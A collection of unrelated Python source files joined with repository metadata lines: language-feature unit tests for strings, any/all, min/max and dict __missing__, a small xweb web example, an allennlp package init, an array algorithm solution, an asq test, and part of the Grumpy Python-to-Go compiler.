\01 \02 \06 \12\33\67\33\ff \ee also"""
suffix = """
\78\ff\43\12\23ok"""
str = prefix + sep + suffix
self.assertEqual(str.rpartition(sep),(prefix,sep,suffix))
self.assertEqual(str.rpartition('nomatch'),('','', str))
self.assertRaises(TypeError,str.rpartition,None)
self.assertRaises(ValueError,str.rpartition,'')
def test_string_startswith(self):
class A:pass
# failure scenarios
self.assertRaises(TypeError,'string'.startswith,None)
self.assertRaises(TypeError,'string'.startswith,(None,"strin","str"))
self.assertRaises(TypeError,'string'.startswith,(None,))
self.assertRaises(TypeError,'string'.startswith,(["this","is","invalid"],"str","stri"))
self.assertRaises(TypeError,'string'.startswith,(("string","this is invalid","this is also invalid",),))
self.assertRaises(TypeError,''.startswith,None)
self.assertRaises(TypeError,''.startswith,(None,"strin","str"))
self.assertRaises(TypeError,''.startswith,(None,))
self.assertRaises(TypeError,''.startswith,(["this","is","invalid"],"str","stri"))
self.assertRaises(TypeError,''.startswith,(("string","this is invalid","this is also invalid",),))
# success scenarios
self.assertEqual('no matching string'.startswith(("matching","string","here")),False)
self.assertEqual('here matching string'.startswith(("matching","string","here")), True)
self.assertEqual('here matching string'.startswith(("here", "matching","string","here")), True)
self.assertEqual('here matching string'.startswith(("matching","here","string",)), True)
self.assertEqual('here matching string'.startswith(("here matching string","here matching string","here matching string",)), True)
s = 'here \12 \34 \ff \e5 \45 matching string'
m = "here \12 \34 \ff \e5 \45 "
m1 = " \12 \34 \ff \e5 \45 "
n = "here \12 \34 \ff \e5 \46 "
n1 = " \12 \34 \ff \e5 \46 "
self.assertEqual(s.startswith((m,None)), True)
self.assertEqual(s.startswith((m,123, ["here","good"])), True)
self.assertEqual(s.startswith(("nomatch",m,123, ["here","good"])), True)
# with start parameter = 0
self.assertEqual(s.startswith((m,None),0), True)
self.assertEqual(s.startswith((n,"nomatch"),0), False)
self.assertEqual(s.startswith((s,"nomatch"),0), True)
self.assertEqual(s.startswith((s + "a","nomatch"),0), False)
self.assertRaises(TypeError, s.startswith,(n,None),0)
self.assertRaises(TypeError, s.startswith,(None, n),0)
self.assertRaises(TypeError, s.startswith,(A, None, m),0)
# with start parameter > 0
self.assertEqual(s.startswith((m1,None),4), True)
self.assertEqual(s.startswith((m,"nomatch"),4), False)
self.assertEqual(s.startswith((n1,"nomatch"),4), False)
self.assertEqual(s.startswith((" \12 \34 \fd \e5 \45 ","nomatch"),4), False)
self.assertEqual(s.startswith((s," \12 \34 \ff \e5 \45 matching string"),4), True)
self.assertEqual(s.startswith((" \12 \34 \ff \e5 \45 matching string" + "a","nomatch"),4), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4)
self.assertRaises(TypeError, s.startswith,(None, n1),4)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4)
self.assertEqual(s.startswith(("g",None),len(s) - 1), True)
self.assertEqual(s.startswith(("g","nomatch"),len(s)), False)
self.assertEqual(s.startswith(("g","nomatch"),len(s) + 400), False)
# with start parameter < 0
self.assertEqual(s.startswith(("string",None),-6), True)
self.assertEqual(s.startswith(("stro","nomatch"),-6), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6), False)
self.assertEqual(s.startswith(("stringandmore","nomatch"),-6), False)
self.assertEqual(s.startswith(("prefixandstring","nomatch"),-6), False)
self.assertRaises(TypeError, s.startswith,("string000",None),-6)
self.assertRaises(TypeError, s.startswith,(None, "string"),-6)
self.assertRaises(TypeError, s.startswith,(A, None, "string"),-6)
self.assertEqual(s.startswith(("here",None),-len(s)), True)
self.assertEqual(s.startswith((s,None),-len(s) - 1 ), True)
self.assertEqual(s.startswith(("here",None),-len(s) - 400), True)
# with start and end parameters
# with +ve start , +ve end
# end > start
self.assertEqual(s.startswith((m1,None),4,len(s)), True)
self.assertEqual(s.startswith((m1,None),4,len(s) + 100), True)
self.assertEqual(s.startswith((n1,"nomatch"),len(s)), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, len(s))
self.assertRaises(TypeError, s.startswith,(None, n1),4 , len(s) + 100)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, len(s))
# end < start
self.assertRaises(TypeError, s.startswith, (m1,None),4,3)
self.assertRaises(TypeError, s.startswith, (m1,None),4,2)
self.assertRaises(TypeError, s.startswith, (n1,None),4, 3)
self.assertRaises(TypeError, s.startswith, (None, n1),4 , 3)
self.assertRaises(TypeError, s.startswith, (A, None, m1),4, 0)
# end == start
self.assertEqual(s.startswith(("",None),4,4), True)
self.assertEqual(s.startswith((m1,),4,4), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, 4)
self.assertRaises(TypeError, s.startswith,(None, n1),4 , 4)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, 4)
# with -ve start , +ve end
# end > start
self.assertEqual(s.startswith(("string",None),-6, len(s)), True)
self.assertEqual(s.startswith(("string",None),-6, len(s) + 100), True)
self.assertEqual(s.startswith(("string","nomatch"),-6, len(s) -2), False)
self.assertEqual(s.startswith(("stro","nomatch"),-6, len(s)-1), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,len(s)), False)
self.assertRaises(TypeError, s.startswith,("string000",None),-6,len(s) + 3)
self.assertRaises(TypeError, s.startswith,(None, "string"),-6, len(s))
self.assertRaises(TypeError, s.startswith,(A, None, "string"),-6,len(s))
self.assertEqual(s.startswith(("here",None),-len(s), 5), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s), 2), False)
self.assertEqual(s.startswith(("here",None),-len(s) - 1, 4 ), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s) - 1, 2 ), False)
# end < start
self.assertRaises(TypeError, s.startswith, ("string",None),-6, 10)
self.assertRaises(TypeError, s.startswith, ("string000",None),-6,10)
self.assertRaises(TypeError, s.startswith, (None, "string"),-6, 10)
self.assertRaises(TypeError, s.startswith, (A, None, "string"),-6,10)
self.assertEqual(s.startswith(("stro","nomatch"),-6, 10), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,10), False)
# end == start
self.assertRaises(TypeError,s.startswith, ("string",None),-6, len(s) -6)
self.assertEqual(s.startswith(("",None),-6, len(s) -6), True)
# with +ve start , -ve end
# end > start
self.assertEqual(s.startswith((m1,None),4,-5 ), True)
self.assertEqual(s.startswith((m1,"nomatch"),4,-(4 + len(m) +1) ), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, -5)
self.assertRaises(TypeError, s.startswith,(None, n1),4 , -5)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, -5)
# end < start
self.assertRaises(TypeError, s.startswith, (m1,None),4,-len(s) + 1)
self.assertRaises(TypeError, s.startswith, (n1,None),4, -len(s))
self.assertRaises(TypeError, s.startswith, (None, n1),4 , -len(s))
self.assertRaises(TypeError, s.startswith, (A, None, m1),4, -len(s))
self.assertEqual(s.startswith((m1,),4,-len(s) + 1), False)
self.assertEqual(s.startswith((m1,),4,-500), False)
# end == start
self.assertEqual(s.startswith(("",None),4,-len(s) + 4), True)
self.assertEqual(s.startswith((m1,"nomatch"),4,-len(s) + 4), False)
self.assertRaises(TypeError, s.startswith,(n1,None),4, -len(s) + 4)
self.assertRaises(TypeError, s.startswith,(None, n1),4 , -len(s) + 4)
self.assertRaises(TypeError, s.startswith,(A, None, m1),4, -len(s) + 4)
# with -ve start , -ve end
# end > start
self.assertEqual(s.startswith(("stri",None),-6, -2), True)
self.assertEqual(s.startswith(("string","nomatch"),-6, -1), False)
self.assertEqual(s.startswith(("stro","nomatch"),-6, -1), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,-1), False)
self.assertEqual(s.startswith(("stringand","nomatch"),-6,-1), False)
self.assertRaises(TypeError, s.startswith,("string000",None),-6, -1)
self.assertRaises(TypeError, s.startswith,(None, "string"),-6, -1)
self.assertRaises(TypeError, s.startswith,(A, None, "string"),-6,-1)
self.assertEqual(s.startswith(("here","nomatch"),-len(s), -5), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s), -len(s) + 2), False)
self.assertEqual(s.startswith(("here","nomatch"),-len(s) - 1, -5 ), True)
self.assertEqual(s.startswith(("here","nomatch"),-len(s) - 1, -len(s) + 2), False)
# end < start
self.assertRaises(TypeError, s.startswith, ("string",None),-6, -7)
self.assertRaises(TypeError, s.startswith, ("string000",None),-6,-8)
self.assertRaises(TypeError, s.startswith, (None, "string"),-6, -8)
self.assertRaises(TypeError, s.startswith, (A, None, "string"),-6,-8)
self.assertEqual(s.startswith(("stro","nomatch"),-6, -8), False)
self.assertEqual(s.startswith(("strong","nomatch"),-6,-8), False)
# end == start
self.assertEqual(s.startswith(("string","nomatch"),-6, -6), False)
self.assertEqual(s.startswith(("",None),-6, -6), True)
def test_string_endswith(self):
#failue scenarios
class A:pass
self.assertRaises(TypeError,'string'.endswith,None)
self.assertRaises(TypeError,'string'.endswith,(None,"tring","ing"))
self.assertRaises(TypeError,'string'.endswith,(None,))
self.assertRaises(TypeError,'string'.endswith,(["this","is","invalid"],"ring","ing"))
self.assertRaises(TypeError,'string'.endswith,(("string","this is invalid","this is also invalid",),))
self.assertRaises(TypeError,''.endswith,None)
self.assertRaises(TypeError,''.endswith,(None,"tring","ring"))
self.assertRaises(TypeError,''.endswith,(None,))
self.assertRaises(TypeError,''.endswith,(["this","is","invalid"],"tring","ring"))
self.assertRaises(TypeError,''.endswith,(("string","this is invalid","this is also invalid",),))
#Positive scenarios
self.assertEqual('no matching string'.endswith(("matching","no","here")),False)
self.assertEqual('here matching string'.endswith(("string", "matching","nomatch")), True)
self.assertEqual('here matching string'.endswith(("string", "matching","here","string")), True)
self.assertEqual('here matching string'.endswith(("matching","here","string",)), True)
self.assertEqual('here matching string'.endswith(("here matching string","here matching string","here matching string",)), True)
s = 'here \12 \34 \ff \e5 \45 matching string'
m = "\e5 \45 matching string"
m1 = "\e5 \45 matching "
n = "\e5 \45 matching strinh"
n1 = "\e5 \45 matching_"
self.assertEqual(s.endswith((m,None)), True)
self.assertEqual(s.endswith((m,123, ["string","good"])), True)
self.assertEqual(s.endswith(("nomatch",m,123, ["here","string"])), True)
#With starts parameter = 0
self.assertEqual(s.endswith((m,None),0), True)
self.assertEqual(s.endswith((n,"nomatch"),0), False)
self.assertEqual(s.endswith((s,"nomatch"),0), True)
self.assertEqual(s.endswith((s + "a","nomatch"),0), False)
self.assertRaises(TypeError, s.endswith,(n,None),0)
self.assertRaises(TypeError, s.endswith,(None, n),0)
self.assertRaises(TypeError, s.endswith,(A, None, m),0)
#With starts parameter > 0
self.assertEqual(s.endswith((m,None),4), True)
self.assertEqual(s.endswith((m,"nomatch"),4), True)
self.assertEqual(s.endswith((n1,"nomatch"),4), False)
self.assertEqual(s.endswith((" \12 \34 \fd \e5 \45 ","nomatch"),4), False)
self.assertEqual(s.endswith((s," \12 \34 \ff \e5 \45 matching string"),4), True)
self.assertEqual(s.endswith((" \12 \34 \ff \e5 \45 matching string" + "a","nomatch"),4), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4)
self.assertRaises(TypeError, s.endswith,(None, n1),4)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4)
self.assertEqual(s.endswith(("g",None),len(s) - 1), True)
self.assertEqual(s.endswith(("g","nomatch"),len(s)), False)
self.assertEqual(s.endswith(("g","nomatch"),len(s) + 400), False)
#With starts parameter < 0
self.assertEqual(s.endswith(("string",None),-6), True)
self.assertEqual(s.endswith(("ring",None),-6), True)
self.assertEqual(s.endswith(("rong","nomatch"),-6), False)
self.assertEqual(s.endswith(("strong","nomatch"),-6), False)
self.assertEqual(s.endswith(("stringandmore","nomatch"),-6), False)
self.assertEqual(s.endswith(("prefixandstring","nomatch"),-6), False)
self.assertRaises(TypeError, s.endswith,("string000",None),-6)
self.assertRaises(TypeError, s.endswith,(None, "string"),-6)
self.assertRaises(TypeError, s.endswith,(A, None, "string"),-6)
self.assertEqual(s.endswith(("string",None),-len(s)), True)
self.assertEqual(s.endswith((s,None),-len(s) - 1 ), True)
self.assertEqual(s.endswith(("string",None),-len(s) - 400), True)
#With starts , end parameter
# with +ve start , +ve end
# end > start
self.assertEqual(s.endswith((m1,"nomatch"),4,len(s)), False)
self.assertEqual(s.endswith((m1,"nomatch"),4,len(s) - 6), True)
self.assertEqual(s.endswith((m1,"nomatch"),4,len(s) - 8), False)
self.assertEqual(s.endswith((n1,"nomatch"),4,len(s) - 6), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, len(s)-6)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , len(s)-6)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, len(s)-6)
# end < start
self.assertRaises(TypeError, s.endswith, (m1,None),4,3)
self.assertRaises(TypeError, s.endswith, (n1,None),4, 3)
self.assertRaises(TypeError, s.endswith, (None, n1),4 , 3)
self.assertRaises(TypeError, s.endswith, (A, None, m1),4, 0)
# end == start
self.assertEqual(s.endswith(("",None),4,4), True)
self.assertEqual(s.endswith((m1,),4,4), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, 4)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , 4)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, 4)
# with -ve start , +ve end
# end > start
self.assertEqual(s.endswith((m1,None),-30, len(s) -6), True)
self.assertEqual(s.endswith((m1,None),-300, len(s) -6 ), True)
self.assertEqual(s.endswith((m1,"nomatch"),-5, len(s) -6), False)
self.assertEqual(s.endswith(("string",None),-30, len(s) + 6), True)
self.assertEqual(s.endswith(("string",None),-300, len(s) + 6 ), True)
self.assertEqual(s.endswith(("here",None),-len(s), 4), True)
self.assertEqual(s.endswith(("here",None),-300, 4 ), True)
self.assertEqual(s.endswith(("hera","nomatch"),-len(s), 4), False)
self.assertEqual(s.endswith(("hera","nomatch"),-300, 4 ), False)
self.assertRaises(TypeError, s.endswith,("here000",None),-len(s),4)
self.assertRaises(TypeError, s.endswith,(None, "here"),-len(s),4)
self.assertRaises(TypeError, s.endswith,(A, None, "here"),-len(s),4)
# end < start
self.assertRaises(TypeError, s.endswith, ("here",None),-len(s) + 4, 2)
self.assertRaises(TypeError, s.endswith, ("here000",None),-len(s) + 4, 2)
self.assertRaises(TypeError, s.endswith, (None, "he"),-len(s) + 4, 2)
self.assertRaises(TypeError, s.endswith, (A, None, "string"),-len(s) + 4, 2)
self.assertEqual(s.endswith(("hera","nomatch"),-len(s) + 4, 2), False)
# end == start
self.assertRaises(TypeError,s.endswith, ("here",None),-6, len(s) -6)
self.assertEqual(s.endswith(("",None),-6, len(s) -6), True)
# with +ve start , -ve end
# end > start
self.assertEqual(s.endswith((m1,None),4,-6 ), True)
self.assertEqual(s.endswith((m1,"nomatch"),4,-7), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, -6)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , -6)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, -6)
# end < start
self.assertRaises(TypeError, s.endswith, (m1,None),4,-len(s) + 1)
self.assertRaises(TypeError, s.endswith, (n1,None),4, -len(s))
self.assertRaises(TypeError, s.endswith, (None, n1),4 , -len(s))
self.assertRaises(TypeError, s.endswith, (A, None, m1),4, -len(s))
self.assertEqual(s.endswith((m1,),4,-len(s) + 1), False)
self.assertEqual(s.endswith((m1,),4,-500), False)
# end == start
self.assertEqual(s.endswith(("",None),4,-len(s) + 4), True)
self.assertEqual(s.endswith((m1,"nomatch"),4,-len(s) + 4), False)
self.assertRaises(TypeError, s.endswith,(n1,None),4, -len(s) + 4)
self.assertRaises(TypeError, s.endswith,(None, n1),4 , -len(s) + 4)
self.assertRaises(TypeError, s.endswith,(A, None, m1),4, -len(s) + 4)
# with -ve start , -ve end
# end > start
self.assertEqual(s.endswith(("stri",None),-6, -2), True)
self.assertEqual(s.endswith(("string","nomatch"),-6, -1), False)
self.assertEqual(s.endswith(("stro","nomatch"),-6, -2), False)
self.assertEqual(s.endswith(("stron","nomatch"),-6,-1), False)
self.assertEqual(s.endswith(("stringand","nomatch"),-6,-1), False)
self.assertRaises(TypeError, s.endswith,("string000",None),-6, -1)
self.assertRaises(TypeError, s.endswith,(None, "string"),-6, -1)
self.assertRaises(TypeError, s.endswith,(A, None, "string"),-6,-1)
self.assertEqual(s.endswith(("here","nomatch"),-len(s), -len(s)+4), True)
self.assertEqual(s.endswith(("here","nomatch"),-len(s), -len(s) + 2), False)
self.assertEqual(s.endswith(("here","nomatch"),-len(s) - 1, -len(s)+4 ), True)
self.assertEqual(s.endswith(("here","nomatch"),-len(s) - 1, -len(s) + 2), False)
# end < start
self.assertRaises(TypeError, s.endswith, ("here",None),-len(s) + 5, -len(s) + 4)
self.assertRaises(TypeError, s.endswith, ("here000",None),-len(s) + 5, -len(s) + 4)
self.assertRaises(TypeError, s.endswith, (None, "here"),-len(s) + 5, -len(s) + 4)
self.assertRaises(TypeError, s.endswith, (A, None, "here"),-len(s) + 5, -len(s) + 4)
self.assertEqual(s.endswith(("hera","nomatch"),-len(s) + 5, -len(s) + 4), False)
# end == start
self.assertEqual(s.endswith(("here","nomatch"),-6, -6), False)
self.assertEqual(s.endswith(("",None),-6, -6), True)
def test_any(self):
class A: pass
a = A()
class enum:
def __iter__(self):
return [1,2,3].__iter__()
self.assertEqual(any(enum()),True) # enumerable class
self.assertRaises(TypeError,any,a)# non - enumerable class
self.assertRaises(TypeError,any,0.000000) # non - enumerable object
self.assertEqual(any([0.0000000,0,False]),False)# all False
self.assertEqual(any((0,False,a)),True) # True class
self.assertEqual(any((0,False,None,"")),False) # None and ""
self.assertEqual(any([]),False) # no items in array
self.assertEqual(any([None]),False) # only None in array
self.assertEqual(any([None,a]),True) # only None and an Object in array
self.assertEqual(any({0:0,False:"hi"}),False) # Dict with All False
self.assertEqual(any({True:0,False:"hi"}),True) # Dict with onely 1 True
self.assertEqual(any({a:"hello",False:"bye"}),True) # Dict with Class
class mylist(list):
def __iter__(self):
return [1,2,0].__iter__()
self.assertEqual(any(mylist()),True)
class raiser:
def __nonzero__(self):
raise RuntimeError
self.assertEqual(any([None,False,0,1,raiser()]),True) # True before the raiser()
self.assertRaises(RuntimeError,any,[None,False,0,0,raiser(),1,2]) # True after the raiser()
self.assertRaises(RuntimeError,any,{None:"",0:1000,raiser():True}) # raiser in dict
self.assertRaises(TypeError,any) # any without any params
self.assertRaises(TypeError,any,(20,30,40),(50,60,70))# any with more params
def test_all(self):
class A: pass
a = A()
class enum:
def __iter__(self):
return [1,2,3].__iter__()
self.assertEqual(all(enum()),True) # enumerable class
self.assertRaises(TypeError,all,a) # non - enumerable class
self.assertRaises(TypeError,all,0.000000) # non - enumerable object
self.assertEqual(all([0.0000000,0,False]),False) # all False
self.assertEqual(all([True,1.89,"hello",a]),True) # all true array ( bool, double, str, class)
self.assertEqual(all((True,1.89,"hello",a)),True) # all true tuple ( bool, double, str, class)
self.assertEqual(all((True,"hello",a,None)),False) # one None in Tuple
self.assertEqual(all((0,False,None,"")),False) # Tuple with None and ""
self.assertEqual(all([]),True) # with empty array
self.assertEqual(all([None]),False) # arry with onle None
self.assertEqual(all([a,None]),False) # array with None and Class
self.assertEqual(all({"hello":"hi",True:0,False:"hi",0:0}),False) # dict with some True, False
self.assertEqual(all({True:0,100:"hi","hello":200,a:100}),True) # dict with all True
class mylist(list):
def __iter__(self):
return [1,2,0].__iter__()
self.assertEqual(all(mylist()),False)
class raiser:
def __nonzero__(self):
raise RuntimeError
self.assertEqual(all([None,False,0,1,raiser()]),False) # array With raiser() after false
self.assertEqual(all({None:"",0:1000,raiser():True}),False) # Dict with raiser after falls
self.assertRaises(RuntimeError,all,[raiser(),200,None,False,0,1,2])# Array with raiser before False
self.assertRaises(RuntimeError,all,{raiser():True,200:"",300:1000})# Dict with raiser before False
self.assertRaises(TypeError,all) # no params
self.assertRaises(TypeError,all,(20,30,40),(50,60,70)) # extra params
def test_max_with_kwarg(self):
class A(int):
def __len__(self):
return 10
a=A()
self.assertEqual(max(a,"aaaaaaa",key=len),a) # 2 args + buitin method
def userfunc(arg):
if(arg == None):return -1
if(type(arg) == bool):return 0
if(type(arg) == int):return 10
if(type(arg) == str):return len(arg)
if(type(arg) == list):return len(arg)
return 40
self.assertEqual(max(["b","aaaaaaaaaaaaaaaaa",["this",True,"is","Python"],0, a, None],key=userfunc),a)# array + user method
self.assertEqual(max(("b","aaa",["this",True,"is","Python"],0, 1.8, True,a, None),key=userfunc),1.8)# Tuple + user method
self.assertEqual(max("b","aaa",["this",None,"is","Python"], True,None,key=userfunc),["this",None,"is","Python"])# param list + user method
# error scenarios
#apply invalid key k
try: max("aaaaa","b",k=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-existing Name
try: max([1,2,3,4],key=method)
except NameError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-callable Method
method = 100
try: max([1,2,3,4],key=method)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply callable on empty list
try: max([],key=len)
except ValueError:pass
else: self.fail("Expected ValueError, but found None")
#apply callable on non-enumerable type
try: max(None,key=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply Method on non callable class
class B:pass
try: max((B(),"hi"),key=len)
except AttributeError:pass
else: self.fail("Expected AttributeError, but found None")
def test_min_with_kwarg(self):
class A(int):
def __len__(self):
return 0
a=A()
self.assertEqual(min(a,"aaaaaaa",key=len),a) # 2 args + buitin method
def userfunc(arg):
if(arg == None):return 100
if(type(arg) == bool):return 90
if(type(arg) == int):return 80
if(type(arg) == str):return len(arg)
if(type(arg) == list):return len(arg)
return 5
self.assertEqual(min(["aaaaaaaaaaaaaaaaa",["this",True,"is","Python","Iron","Python"],0, a, None],key=userfunc),a)# array + user method
self.assertEqual(min(("aaaaaaaaaaaaa",["this",True,"is","Python","Iron","Python"],0, 1.8, True,a, None),key=userfunc),1.8)# Tuple + user method
self.assertEqual(min("aaaaaaaaaaaaaa",["this",None,"is","Python"], True,None,key=userfunc),["this",None,"is","Python"])# param list + user method
# error scenarios
#apply invalid key k
try: min("aaaaa","b",k=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-existing Name
try: min([1,2,3,4],key=method)
except NameError:pass
else: self.fail("Expected TypeError, but found None")
#apply non-callable Method
method = 100;
try: min([1,2,3,4],key=method)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply callable on empty list
try: min([],key=len)
except ValueError:pass
else: self.fail("Expected ValueError, but found None")
#apply callable on non-enumerable type
try: min(None,key=len)
except TypeError:pass
else: self.fail("Expected TypeError, but found None")
#apply Method on non callable class
class B:pass
try: min((B(),"hi"),key=len)
except AttributeError:pass
else: self.fail("Expected AttributeError, but found None")
def test_missing(self):
# dict base class should not have __missing__
self.assertEqual(hasattr(dict, "__missing__"), False)
# positive cases
class A(dict):
def __missing__(self,key):
return 100
a = A({1:1, "hi":"bye"})
def fun():pass
self.assertEqual(hasattr(A, "__missing__"), True)
self.assertEqual( (a["hi"],a[23112],a["das"], a[None],a[fun],getattr(a,"__missing__")("IP")),("bye",100,100,100,100,100))
# negative case
try: a[not_a_name]
except NameError: pass
except: self.fail("Expected NameError, but found", sys.exc_info())
else: self.fail("Expected NameError, but found None")
# extra paramaters
self.assertRaises(TypeError,a.__missing__,300,400)
# less paramaters
self.assertRaises(TypeError,a.__missing__)
self.assertRaises(TypeError,a.__getitem__,A())
#invalid __missing__ methods
A.__missing__ = "dont call me!"
self.assertRaises(TypeError,a.__getitem__,300)
# set missing to with new function
def newmissing(self,key): return key/2
A.__missing__ = newmissing
self.assertEqual( a[999], 999/2);
self.assertRaises(TypeError,a.__getitem__,"sometext")
del A.__missing__
self.assertEqual( a[1], 1);
self.assertRaises(KeyError,a.__getitem__,"sometext")
# inheritance scenarios
#basic inheritance
class M(dict):
def __missing__(self,key): return 99
class N(M):pass
self.assertEqual(N({"hi":"bye"})["none"], 99)
class C:
def __missing__(self,key): return 100
class D(C,dict):pass
self.assertEqual(D({"hi":"bye"})["none"], 100)
# inheritance -> override __missing__
class E(dict):
def __missing__(self,key): return 100
class F(E,dict):
def __missing__(self,key): return 50
self.assertEqual(F({"hi":"bye"})["none"], 50)
def test_with(self):
# nested with can not have a yield
class J:
def __enter__(self):pass
def __exit__(self,a,b,c):pass
try:
c = compile(
"""def nest():
with J():
with J():
yield 100
""","","exec")
except SyntaxError,e: pass
def test_importwarning(self):
exc_list = []
exc_list.append(ImportWarning())
exc_list.append(ImportWarning("some message"))
import exceptions
exc_list.append(exceptions.ImportWarning())
exc_list.append(exceptions.ImportWarning("some message"))
for exc in exc_list:
try:
raise exc
except exceptions.ImportWarning, e:
pass
def test_overflowwarning(self):
self.assertRaises(AttributeError, lambda: exceptions.OverflowWarning)
def test_cp5609(self):
from os import remove
temp_name = "test_cp5609.txt"
with open(temp_name, "w") as f:
self.assertTrue(not f.closed)
f.write("xyz")
self.assertTrue(hasattr(f, "__enter__"))
self.assertTrue(hasattr(f, "__exit__"))
self.assertTrue(f.closed)
with open(temp_name, "r") as f:
self.assertTrue(not f.closed)
self.assertEqual(f.readlines(), ["xyz"])
self.assertTrue(hasattr(f, "__enter__"))
self.assertTrue(hasattr(f, "__exit__"))
self.assertTrue(f.closed)
remove(temp_name)
run_test(__name__)
|
example.py
|
gaojiuli/xweb
| 357 |
88944
|
from xweb import App, Model, RESTController
class UserModel(Model):
schema = {
"type": "object",
"properties": {
"username": {"type": "string"},
"password": {"type": "string"},
},
"required": ['username']
}
class EventController(RESTController):
async def get(self):
Model.validate(self.ctx.json)
self.ctx.body = {"Hello": "World"}
app = App()
app.routes = {
'/': EventController
}
app.listen()
|
allennlp/nn/parallel/__init__.py
|
MSLars/allennlp
| 11,433 |
88956
|
<filename>allennlp/nn/parallel/__init__.py
from allennlp.nn.parallel.sharded_module_mixin import ShardedModuleMixin
from allennlp.nn.parallel.ddp_accelerator import (
DdpAccelerator,
DdpWrappedModel,
TorchDdpAccelerator,
)
from allennlp.nn.parallel.fairscale_fsdp_accelerator import (
FairScaleFsdpAccelerator,
FairScaleFsdpWrappedModel,
)
|
Arrays/longest_increasing_subarray.py
|
techsavvyy/coding-problems
| 2,647 |
89002
|
<filename>Arrays/longest_increasing_subarray.py<gh_stars>1000+
'''
Longest Increasing Subarray
Find the longest increasing subarray (subarray is when all elements are neighboring in the original array).
Input: [10, 1, 3, 8, 2, 0, 5, 7, 12, 3]
Output: 4
=========================================
Only in one iteration, check if the current element is bigger than the previous and increase the counter if true.
Time Complexity: O(N)
Space Complexity: O(1)
'''
############
# Solution #
############
def longest_increasing_subarray(arr):
n = len(arr)
longest = 0
current = 1
i = 1
while i < n:
if arr[i] < arr[i - 1]:
longest = max(longest, current)
current = 1
else:
current += 1
i += 1
# check again for max, maybe the last element is a part of the longest subarray
return max(longest, current)
###########
# Testing #
###########
# Test 1
# Correct result => 4
print(longest_increasing_subarray([10, 1, 3, 8, 2, 0, 5, 7, 12, 3]))
|
asq/test/test_to_set.py
|
sixty-north/asq
| 175 |
89007
|
import unittest
from asq.queryables import Queryable
__author__ = "<NAME>"
class TestToSet(unittest.TestCase):
def test_to_set(self):
a = [1, 2, 4, 8, 16, 32]
b = Queryable(a).to_set()
c = set([1, 2, 4, 8, 16, 32])
self.assertEqual(b, c)
def test_to_set_closed(self):
a = [1, 2, 4, 8, 16, 32]
b = Queryable(a)
b.close()
self.assertRaises(ValueError, lambda: b.to_set())
def test_to_set_duplicates(self):
a = [1, 2, 4, 8, 8, 16, 32]
b = Queryable(a)
self.assertRaises(ValueError, lambda: b.to_set())
|
grumpy-tools-src/grumpy_tools/grumpc.py
|
Srinivas11789/grumpy
| 386 |
89015
|
<filename>grumpy-tools-src/grumpy_tools/grumpc.py
#!/usr/bin/env python
# coding=utf-8
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Python -> Go transcompiler."""
from __future__ import unicode_literals
import argparse
import os
import sys
from StringIO import StringIO
import textwrap
import pickle
import logging
import dill
from .compiler import block
from .compiler import imputil
from .compiler import stmt
from .compiler import util
from .compiler.parser import patch_pythonparser
import pythonparser
from .pep_support.pep3147pycache import make_transpiled_module_folders, should_refresh, set_checksum, fixed_keyword
from . import pydeps
logger = logging.getLogger(__name__)
def _parse_and_visit(stream, script, modname):
patch_pythonparser()
gopath = os.environ['GOPATH']
stream.seek(0)
py_contents = stream.read()
mod = pythonparser.parse(py_contents)
# Do a pass for compiler directives from `from __future__ import *` statements
future_node, future_features = imputil.parse_future_features(mod)
importer = imputil.Importer(gopath, modname, script,
future_features.absolute_import)
full_package_name = modname.replace('.', '/')
mod_block = block.ModuleBlock(importer, full_package_name, script,
py_contents, future_features)
visitor = stmt.StatementVisitor(mod_block, future_node)
# Indent so that the module body is aligned with the goto labels.
with visitor.writer.indent_block():
visitor.visit(mod)
return visitor, mod_block
def _collect_deps(script, modname, pep3147_folders, from_cache=False, update_cache=True):
if from_cache:
try:
with open(pep3147_folders['dependencies_file']) as deps_dumpfile:
deps, import_objects = pickle.load(deps_dumpfile)
return deps, import_objects
except Exception as err:
# Race conditions with other scripts running or stale/broken dump
logger.info("Could not load dependencies of '%s' from cache.", modname)
if os.path.exists(script):
deps, import_objects = pydeps.main(script, modname, with_imports=True) #, script, gopath)
elif os.path.exists(os.path.join(pep3147_folders['cache_folder'], os.path.basename(script))):
deps, import_objects = pydeps.main(
os.path.join(pep3147_folders['cache_folder'], os.path.basename(script)),
modname,
package_dir=os.path.dirname(script),
with_imports=True,
)
